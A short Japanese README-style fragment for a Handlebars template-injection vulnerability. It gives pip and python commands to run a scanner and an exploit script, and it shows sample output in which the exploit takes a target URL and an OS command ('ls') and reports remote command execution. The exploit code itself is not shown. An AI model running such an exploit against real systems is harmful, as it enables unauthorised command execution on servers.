
Handlebars の下流コンポーネントが使用する出力内の特殊要素の不適切な無効化('インジェクション')の脆弱性
Handlebars の下流コンポーネントが使用する出力内の特殊要素の不適切な無害化('インジェクション')の脆弱性
pip install requests packaging
python handlebars_scanner.py
pip install requests
python handlebars_exploit.py
ターゲット URL を入力:
エクスプロイトの期待される出力: ターゲット URL を入力(例: http://example.com/render): http://example.com/render
実行する OS コマンドを入力: ls
[+] エクスプロイトペイロードを http://example.com/render に送信中...
[+] ペイロードの実行に成功しました。
[+] レスポンス:
file1.txt file2.txt